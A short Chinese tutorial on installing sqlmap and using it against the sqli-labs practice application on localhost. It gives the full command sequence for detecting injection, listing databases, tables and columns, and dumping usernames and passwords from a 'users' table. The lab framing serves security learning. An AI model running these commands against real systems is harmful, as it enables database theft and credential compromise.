一、sqlmap的安装
由于SQLMap是利用Python语言写的,文章只记录安排sqlmap的安装过程,还未安装Python这个语言环境的同学,点击这里!!!
sqlmap的下载
下载地址: https://www.cnblogs.com/lvtaohome/p/11121377.html
点击下载蓝色的zip file
安装过程
将下载的SQLMAP安装包解压到文件夹sqlmap中,并拷贝到自己的python目录下,例如图下 “D:\python3.8\sqlmap”
然后打开cmd命令提示符的文件所在位置,右键发送到桌面快捷方式
接着在桌面即可看到一个快捷方式,重命名为sqlmap,右键点击属性修改起始位置
起始位置即为sqlmap.py 的所在位置
确定修改好之后,点击桌面快捷方式并输入sqlmap.py -h敲回车,出现如下信息则表示安装成功。
二、利用sqlmap进行SQL注入
首先选择好需要进行爆破的网址,例如爆破如下网址
打开sqlmap,输入sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1。
出现如图所示情况即为可注入,一直选择Y即可。
然后接着输入sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 --dbs,显示当前用户有权限读取包含所有数据库列表信息的表中的时候,即可列出所有的数据库。即爆出所有数据库。
选择你所要爆数据的数据库,爆出其所有表,输入sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 -D security --tables
选择你所需表,输入sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 -D security -T users --columns,即可列出指定数据库表中的字段,同时也会列出字段的数据类型。
如果没有使用-D参数指定数据库时,默认会使用当前数据库。
接着直接输入sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 --dump -D security -T users -C ‘id password username’,即可得出所有数据。
关于sqlmap的详细使用教程,这有链接!!!点这,直接进入学习